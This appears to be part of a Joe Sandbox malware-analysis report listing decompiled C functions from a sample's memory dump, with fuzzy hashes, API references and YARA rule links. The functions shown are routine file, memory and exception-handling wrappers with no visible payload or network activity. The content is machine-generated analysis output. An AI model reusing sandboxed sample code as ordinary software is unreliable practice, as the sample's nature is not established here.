Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$free
String ID:
API String ID: 2654054672-0
Opcode ID: 728656c154c79e3640467da3d1dd369a93413695509cfd56ac0ae59aba9a333c
Instruction ID: 9ff98c2d2858f5676d26b2fcb0e5ae345ac01743015ec23c8b6fe664862117fb
Opcode Fuzzy Hash: 728656c154c79e3640467da3d1dd369a93413695509cfd56ac0ae59aba9a333c
Instruction Fuzzy Hash: 47F0E9325012129BD711AF0AD481B9EF7A9EF14724F04417FE101772C2CB789C008989

Uniqueness

Uniqueness Score: -1.00%

Function 004051AE, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004051AE(void* __ecx, void* __eflags) {
				void* _t12;
				void* _t27;

				E00418D80(E004199B4, _t27);
				E00404D7D(_t27 - 0x44);
				E0040368D(_t27 - 0x1c);
				_t3 = _t27 - 4;
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				_t12 = E00404DAF(_t27 - 0x44,  *_t3, __ecx); // executed
				E00403204(_t12,  *((intOrPtr*)(_t27 - 0x1c)));
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return _t12;
			}

0x004051b3
0x004051c2
0x004051ca
0x004051cf
0x004051cf
0x004051d7
0x004051e1
0x004051ee
0x004051f6

APIs

__EH_prolog.LIBCMT ref: 004051B3

Part of subcall function 00404DAF: __EH_prolog.LIBCMT ref: 00404DB4

Part of subcall function 00403204: free.MSVCRT(00000000,004037A4,?,?,00000000,?,?,?,00403083,?,?,?,?,00000000,0040108B), ref: 00403208

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$free
String ID:
API String ID: 2654054672-0
Opcode ID: 264148019a1cdb291cfcf2f50279c9645f2db8245b07abc43ab4fb8d1ae2bb0f
Instruction ID: 38aad06e79cda41a368b4c7dfbcb60c19aab280267c900351c7127d69cc129a5
Opcode Fuzzy Hash: 264148019a1cdb291cfcf2f50279c9645f2db8245b07abc43ab4fb8d1ae2bb0f
Instruction Fuzzy Hash: 98E09272C400049AC704FB55E852AECB778EF61319F10407FE412731D18B3C1F08CA58

Uniqueness

Uniqueness Score: -1.00%

Function 00409493, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E00409493(void* __ecx) {
				intOrPtr _t9;
				signed int _t10;
				void* _t11;
				intOrPtr _t14;
				void* _t18;
				void* _t20;

				E00418D80(E00419CB6, _t20);
				_push(__ecx);
				_t18 = __ecx;
				_push(0x24); // executed
				_t9 = E004031DD(); // executed
				_t14 = _t9;
				 *((intOrPtr*)(_t20 - 0x10)) = _t14;
				_t10 = 0;
				_t23 = _t14;
				 *(_t20 - 4) = 0;
				if(_t14 != 0) {
					_push( *((intOrPtr*)(_t20 + 8)));
					_t10 = E0040950A(_t14, _t23);
				}
				 *(_t20 - 4) =  *(_t20 - 4) | 0xffffffff;
				_t11 = E004088FD(_t18, _t10);
				 *[fs:0x0] =  *((intOrPtr*)(_t20 - 0xc));
				return _t11;
			}

0x00409498
0x0040949d
0x0040949f
0x004094a1
0x004094a3
0x004094a9
0x004094ab
0x004094ae
0x004094b0
0x004094b2
0x004094b5
0x004094b7
0x004094ba
0x004094ba
0x004094bf
0x004094c6
0x004094cf
0x004094d7

APIs

__EH_prolog.LIBCMT ref: 00409498

Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD

Part of subcall function 0040950A: __EH_prolog.LIBCMT ref: 0040950F

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$ExceptionThrowmalloc
String ID:
API String ID: 3744649731-0
Opcode ID: 4b528696f59aab3bcf5807e590b472d617c9c4ff83b05d653dc8ecc22c59f10d
Instruction ID: 228697bc30b66583063671ae9736afe559f4e6309b613c1622b7ba624724d52c
Opcode Fuzzy Hash: 4b528696f59aab3bcf5807e590b472d617c9c4ff83b05d653dc8ecc22c59f10d
Instruction Fuzzy Hash: 6FE09272B00655AFCB08EF69D80669D76E49B09324F00823FE026F22C2DF784E00865C

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCA3, Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040DCA3(intOrPtr __ecx, void* __eflags) {
				void* _t27;

				E00418D80(E0041A402, _t27);
				_push(__ecx);
				 *((intOrPtr*)(_t27 - 0x10)) = __ecx;
				 *((intOrPtr*)(__ecx)) = 0x41bd04;
				 *((intOrPtr*)(__ecx + 4)) = 0x41bce8;
				 *(__ecx + 8) =  *(__ecx + 8) & 0x00000000;
				 *(_t27 - 4) =  *(_t27 - 4) & 0x00000000;
				E0040DD07(__eflags); // executed
				_t8 = __ecx + 0x28;
				 *(__ecx + 0x28) =  *(__ecx + 0x28) & 0x00000000;
				 *(_t27 - 4) = 1;
				E0040DF75(__ecx + 0x30,  *_t8);
				 *((intOrPtr*)(__ecx)) = 0x41bcb4;
				 *((intOrPtr*)(__ecx + 4)) = 0x41bc98;
				 *((intOrPtr*)(__ecx + 0x180)) = 4;
				 *[fs:0x0] =  *((intOrPtr*)(_t27 - 0xc));
				return __ecx;
			}

0x0040dca8
0x0040dcad
0x0040dcb1
0x0040dcb4
0x0040dcba
0x0040dcc1
0x0040dcc5
0x0040dccc
0x0040dcd1
0x0040dcd1
0x0040dcd8
0x0040dcdc
0x0040dce4
0x0040dcea
0x0040dcf1
0x0040dcfe
0x0040dd06

APIs

__EH_prolog.LIBCMT ref: 0040DCA8

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 556981a7186a9669ba3390ac916edf3df05c09ea9c5c3581f725f413cec59042
Instruction ID: a9dd8ae4a789225e50b84d489bf84e0c6a5884a04ef7bcfbc1ff797b67dd35a1
Opcode Fuzzy Hash: 556981a7186a9669ba3390ac916edf3df05c09ea9c5c3581f725f413cec59042
Instruction Fuzzy Hash: 17F017B1921B54DBD724DF54D1047DABBF4FF14319F00891ED09653681DBB86988CB98

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9A6, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040C9A6(void* __ebx, signed int __ecx) {
				void* _t13;
				void* _t26;

				E00418D80(E0041A1DF, _t26);
				_push(__ecx);
				 *((intOrPtr*)(_t26 - 0x10)) = __ecx;
				 *(_t26 - 4) = 2;
				E0040CF16(__ebx, __ecx + 0x78); // executed
				 *(_t26 - 4) = 1;
				E0040CEC5(__ebx, __ecx + 0x6c); // executed
				 *(_t26 - 4) =  *(_t26 - 4) | 0xffffffff;
				asm("sbb ecx, ecx");
				_t13 = E0040C9F3( ~__ecx & __ecx + 0x00000004);
				 *[fs:0x0] =  *((intOrPtr*)(_t26 - 0xc));
				return _t13;
			}

0x0040c9ab
0x0040c9b0
0x0040c9b4
0x0040c9ba
0x0040c9c1
0x0040c9c9
0x0040c9cd
0x0040c9d2
0x0040c9dd
0x0040c9e1
0x0040c9ea
0x0040c9f2

APIs

__EH_prolog.LIBCMT ref: 0040C9AB

Part of subcall function 0040CF16: __EH_prolog.LIBCMT ref: 0040CF1B

Part of subcall function 0040CEC5: __EH_prolog.LIBCMT ref: 0040CECA

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 60b1df6c3d2834dbf76d900981a7432336127acb7126d7a06376be963e88a761
Instruction ID: 26fffc1e8155d05b72e6de97fa5396bbbae1cf3f6b56db7a32a7b9711ce441f4
Opcode Fuzzy Hash: 60b1df6c3d2834dbf76d900981a7432336127acb7126d7a06376be963e88a761
Instruction Fuzzy Hash: 78E0E571900664DADB08EB58C4523DCB760EB05328F00436EA853B32C1CBB82B00C689

Uniqueness

Uniqueness Score: -1.00%

Function 00409D63, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00409D63(void* __ecx) {
				void* _t28;
				intOrPtr _t30;

				E00418D80(E00419D8C, _t28);
				_push(__ecx);
				 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
				 *((intOrPtr*)(_t28 - 0x10)) = _t30;
				E004063E5( *((intOrPtr*)(_t28 + 0xc)),  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) +  *(_t28 + 8) * 4)) + 4))());
				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
				return 0;
			}

0x00409d68
0x00409d6d
0x00409d74
0x00409d7e
0x00409d88
0x00409da1
0x00409daa

APIs

__EH_prolog.LIBCMT ref: 00409D68

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 22b65b6785276599533fcaba3636d19bbd4ba6f6a0a11f096905abfa694f3633
Instruction ID: 924b7e828e2619065f90ec1c606901b0d7d869b936ff608bc391d1a571cd581b
Opcode Fuzzy Hash: 22b65b6785276599533fcaba3636d19bbd4ba6f6a0a11f096905abfa694f3633
Instruction Fuzzy Hash: 8AE0ED76614104EFC704EF99D855F9EB7B8EF49354F10846EF40A97281C7799900CA68

Uniqueness

Uniqueness Score: -1.00%

Function 0040525F, Relevance: 1.5, APIs: 1, Instructions: 23
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040525F(void** __ecx, void* __eflags, WCHAR* _a4, long _a8, long _a12, long _a16, long _a20) {
				void* _t8;
				void* _t9;
				void** _t14;

				_t14 = __ecx;
				_t8 = E00405298(__ecx);
				if(_t8 != 0) {
					_t9 = CreateFileW(_a4, _a8, _a12, 0, _a16, _a20, 0); // executed
					 *_t14 = _t9;
					return 0 | _t9 != 0xffffffff;
				}
				return _t8;
			}

0x00405263
0x00405265
0x0040526c
0x00405281
0x0040528f
0x00000000
0x00405291
0x00405295

APIs

Part of subcall function 00405298: FindCloseChangeNotification.KERNELBASE(?,000000FF,0040526A,?,?,0040538F,?,80000000,00000000,00000000,00000000,004053B0,00000000,?,00000003,00000080), ref: 004052A3

CreateFileW.KERNELBASE(?,?,00000000,00000000,?,0041B558,00000000,?,?,0040538F,?,80000000,00000000,00000000,00000000,004053B0), ref: 00405281

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ChangeCloseCreateFileFindNotification
String ID:
API String ID: 727422849-0
Opcode ID: 9807379ff81c3d490cf68a83d96df0eb8ecc633cde6dd9f935d588c58eaabe44
Instruction ID: d556d6ed1a1370b11f352619dc192e4bd69da4566a87ece580b0bc5f49a6e668
Opcode Fuzzy Hash: 9807379ff81c3d490cf68a83d96df0eb8ecc633cde6dd9f935d588c58eaabe44
Instruction Fuzzy Hash: D0E04F360002196BCF115F64AC01BCE3B95EF19360F14452ABA24A62E0C7728461AF94

Uniqueness

Uniqueness Score: -1.00%

Function 00404643, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00404643(WCHAR* __ecx, void* __eflags) {
				signed int _t7;
				signed int _t8;
				void* _t10;
				WCHAR* _t15;

				_t15 = __ecx;
				_t7 = E00404DA0(__ecx);
				if(_t7 == 0xffffffff || (_t7 & 0x00000010) != 0 || (_t7 & 0x00000001) == 0) {
					L5:
					_t8 = GetFileSecurityW(_t15, ??, ??, ??, ??); // executed
					return _t8 & 0xffffff00 | _t8 != 0x00000000;
				} else {
					_t10 = E00404462(__ecx, _t7 & 0xfffffffe);
					if(_t10 != 0) {
						goto L5;
					} else {
						return _t10;
					}
				}
			}

0x00404644
0x00404646
0x0040464e
0x0040466a
0x0040466b
0x00404677
0x00404658
0x0040465f
0x00404666
0x00000000
0x00404669
0x00404669
0x00404669
0x00404666

APIs

Part of subcall function 00404DA0: GetFileAttributesW.KERNELBASE(?,004050D2,?,?,0000002A,0000005C,?,?,?,00000001), ref: 00404DA1

GetFileSecurityW.KERNELBASE(?,?,0040479E,?,?,?,0000005C,?,?,769682C0,?,00000000), ref: 0040466B

Part of subcall function 00404462: GetLongPathNameW.KERNELBASE(?,00000000,004047EE,?,769682C0,?,00000000), ref: 00404464

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: File$AttributesLongNamePathSecurity
String ID:
API String ID: 2007464404-0
Opcode ID: 4af3f9c4ac87f317a383e19ebbf4be1568d8f498abffe729fc2456daa46237b6
Instruction ID: c98f3abb563ab1bb48d32cbdf2bd3b216670aee835f997c4b583ea26d8f2b8e7
Opcode Fuzzy Hash: 4af3f9c4ac87f317a383e19ebbf4be1568d8f498abffe729fc2456daa46237b6
Instruction Fuzzy Hash: 50D02B61101120018DE0297C38057DB12050ED33347148B77FEA0F23D1EB7E8C83009C

Uniqueness

Uniqueness Score: -1.00%

Function 004054CD, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E004054CD(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				long _t12;
				signed int _t14;
				void** _t16;

				_t16 = __ecx;
				_push(__ecx);
				_t12 =  *0x41f0b8; // 0x400000
				if(_a8 > _t12) {
					_a8 = _t12;
				}
				_v8 = _v8 & 0x00000000;
				_t14 = WriteFile( *_t16, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t14 & 0xffffff00 | _t14 != 0x00000000;
			}

0x004054cd
0x004054d0
0x004054d1
0x004054d9
0x004054db
0x004054db
0x004054e4
0x004054f0
0x004054fe
0x00405504

APIs

WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 004054F0

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 8754c39352e6b572958dd94eb4906f8bfe997afb7bdf6dd0c5210f13dd38fcb2
Instruction ID: 32868f3a29a398ab14785254ccb1bf50569d93ec041cad7fd8186f98d882653d
Opcode Fuzzy Hash: 8754c39352e6b572958dd94eb4906f8bfe997afb7bdf6dd0c5210f13dd38fcb2
Instruction Fuzzy Hash: B7E0E579600208FFCB11CF95C801BCE7BFAEB08355F20C069F9189A260D339AA55DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040810E, Relevance: 1.5, APIs: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040810E(intOrPtr __ecx) {
				void* _t8;
				void* _t17;
				intOrPtr _t19;

				E00418D80(E00419B38, _t17);
				_push(__ecx);
				_push(__ecx);
				 *(_t17 - 4) =  *(_t17 - 4) & 0x00000000;
				 *((intOrPtr*)(_t17 - 0x10)) = _t19;
				 *((intOrPtr*)(_t17 - 0x14)) = __ecx;
				_t8 = E0040814D(__ecx, 0); // executed
				 *[fs:0x0] =  *((intOrPtr*)(_t17 - 0xc));
				return _t8;
			}

0x00408113
0x00408118
0x00408119
0x0040811a
0x00408121
0x00408126
0x00408129
0x00408133
0x0040813c

APIs

__EH_prolog.LIBCMT ref: 00408113

Part of subcall function 0040814D: __EH_prolog.LIBCMT ref: 00408152

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 9eca010d204422902fe07f867e60df36874e4cd661f802f806a107c05fca104b
Instruction ID: 0ca9ab5b8f1d60bd9c73bc96d98377938e635d19cdb4d5b29e0664e23227e72b
Opcode Fuzzy Hash: 9eca010d204422902fe07f867e60df36874e4cd661f802f806a107c05fca104b
Instruction Fuzzy Hash: 9AD01271950208EBD7149B49E902BDEB778EB41758F10452FF00165180C7B95A008669

Uniqueness

Uniqueness Score: -1.00%

Function 004053C1, Relevance: 1.5, APIs: 1, Instructions: 18
fileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E004053C1(void** __ecx, void* _a4, long _a8, intOrPtr* _a12) {
				long _v8;
				signed int _t11;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t11 = ReadFile( *__ecx, _a4, _a8,  &_v8, 0); // executed
				 *_a12 = _v8;
				return _t11 & 0xffffff00 | _t11 != 0x00000000;
			}

0x004053c4
0x004053cb
0x004053d7
0x004053e5
0x004053eb

APIs

ReadFile.KERNELBASE(000000FF,?,?,00000000,00000000,000000FF,?,0040540C,?,?,00000000,?,00405432,?,?,00000000), ref: 004053D7

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 7680b6ca8a144e951c888a795149d2d53928818e18071b104f126b41f4adbd68
Instruction ID: bc519ebe3b5b6386e9621bf61f3413b29384c9a634b5b939dab0404262013cc0
Opcode Fuzzy Hash: 7680b6ca8a144e951c888a795149d2d53928818e18071b104f126b41f4adbd68
Instruction Fuzzy Hash: 76E0EC75200208FBCB01CF90CC01FCE7BB9FB49754F20C058E91596160D375AA14EB54

Uniqueness

Uniqueness Score: -1.00%

Function 00404BEE, Relevance: 1.5, APIs: 1, Instructions: 17
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BEE(void** __ecx, intOrPtr _a4) {
				struct _WIN32_FIND_DATAW _v596;
				int _t5;

				_t5 = FindNextFileW( *__ecx,  &_v596); // executed
				if(_t5 != 0) {
					E00404B8C( &_v596, _a4, __eflags);
					return 1;
				}
				return 0;
			}

0x00404c00
0x00404c08
0x00404c17
0x00000000
0x00404c1c
0x00000000

APIs

FindNextFileW.KERNELBASE(000000FF,?), ref: 00404C00

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: FileFindNext
String ID:
API String ID: 2029273394-0
Opcode ID: c4609d8de41ccdaab4e1c7bc9efeac1eeb3cd6958e8da37b1abb75d29d41c6c1
Instruction ID: 6514850b34d96ac27011973a87a4576330e77776678e8d48275e438d2eb40076
Opcode Fuzzy Hash: c4609d8de41ccdaab4e1c7bc9efeac1eeb3cd6958e8da37b1abb75d29d41c6c1
Instruction Fuzzy Hash: FBD05B701041189BDB10DF60CC499AB777CABD1349F1040759A05E71A0D639D949DBAD

Uniqueness

Uniqueness Score: -1.00%

Function 00410E73, Relevance: 1.5, APIs: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00410E73(void* __ecx) {
				intOrPtr _t7;
				intOrPtr _t10;
				void* _t12;

				E00418D80(E0041A622, _t12);
				_push(__ecx);
				_push(0x188);
				_t10 = E004031DD();
				 *((intOrPtr*)(_t12 - 0x10)) = _t10;
				_t7 = 0;
				_t15 = _t10;
				 *((intOrPtr*)(_t12 - 4)) = 0;
				if(_t10 != 0) {
					_t7 = E0040DCA3(_t10, _t15); // executed
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t12 - 0xc));
				return _t7;
			}

0x00410e78
0x00410e7d
0x00410e7e
0x00410e89
0x00410e8b
0x00410e8e
0x00410e90
0x00410e92
0x00410e95
0x00410e97
0x00410e97
0x00410e9f
0x00410ea7

APIs

__EH_prolog.LIBCMT ref: 00410E78

Part of subcall function 004031DD: malloc.MSVCRT ref: 004031E3
Part of subcall function 004031DD: _CxxThrowException.MSVCRT(?,0041C8C8), ref: 004031FD

Part of subcall function 0040DCA3: __EH_prolog.LIBCMT ref: 0040DCA8

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: H_prolog$ExceptionThrowmalloc
String ID:
API String ID: 3744649731-0
Opcode ID: bd17aa57d55e5f7ba60f60e0126942ef50211aff7d8658aad84ef683687c9bb7
Instruction ID: cba1e8ea3cc59bc4478667252af174c53adf0a6d33d98c46e50d2fdcf3a083dd
Opcode Fuzzy Hash: bd17aa57d55e5f7ba60f60e0126942ef50211aff7d8658aad84ef683687c9bb7
Instruction Fuzzy Hash: 81D05E71F042849BCB08FFF994227AD76A0AB48348F00853FE012E67C0DFB85A808A19

Uniqueness

Uniqueness Score: -1.00%

Function 00405298, Relevance: 1.5, APIs: 1, Instructions: 16
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00405298(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindCloseChangeNotification(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}

0x00405299
0x0040529b
0x004052a0
0x004052b4
0x004052b7
0x004052a2
0x004052a3
0x004052ab
0x004052b1
0x00000000
0x004052ad
0x004052b0
0x004052b0
0x004052ab

APIs

FindCloseChangeNotification.KERNELBASE(?,000000FF,0040526A,?,?,0040538F,?,80000000,00000000,00000000,00000000,004053B0,00000000,?,00000003,00000080), ref: 004052A3

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306418455.000000000041B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.306485883.000000000041F000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.306568095.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_0CA57F85E88001EDD67DFF84428375DE282F0F92E5BEF.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a70d0e270c00220fc0e1caf0f16e22cd4a5fb1ec1f3136ff0860332eb57d27a1
Instruction ID: 0e5df7a028251fcaba9f82fb0a08b03a75193d26b760c08bd3ff78e88b2aa95c
Opcode Fuzzy Hash: a70d0e270c00220fc0e1caf0f16e22cd4a5fb1ec1f3136ff0860332eb57d27a1
Instruction Fuzzy Hash: 46D0C93110556146DE646E3C78449C337999E0633432147AAF4B0E62E1D3748C835E94

Uniqueness

Uniqueness Score: -1.00%

Function 00404B27, Relevance: 1.5, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404B27(void** __ecx) {
				void* _t1;
				int _t3;
				signed int* _t6;

				_t6 = __ecx;
				_t1 =  *__ecx;
				if(_t1 == 0xffffffff) {
					L4:
					return 1;
				} else {
					_t3 = FindClose(_t1); // executed
					if(_t3 != 0) {
						 *_t6 =  *_t6 | 0xffffffff;
						goto L4;
					} else {
						return 0;
					}
				}
			}

0x00404b28
0x00404b2a
0x00404b2f
0x00404b43
0x00404b46
0x00404b31
0x00404b32
0x00404b3a
0x00404b40
0x00000000
0x00404b3c
0x00404b3f
0x00404b3f
0x00404b3a

APIs

FindClose.KERNELBASE(00000000,000000FF,00404B58), ref: 00404B32

Memory Dump Source

Source File: 00000001.00000002.306241026.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.306205675.0000000000400000.00000002.00020000.sdmp Download File
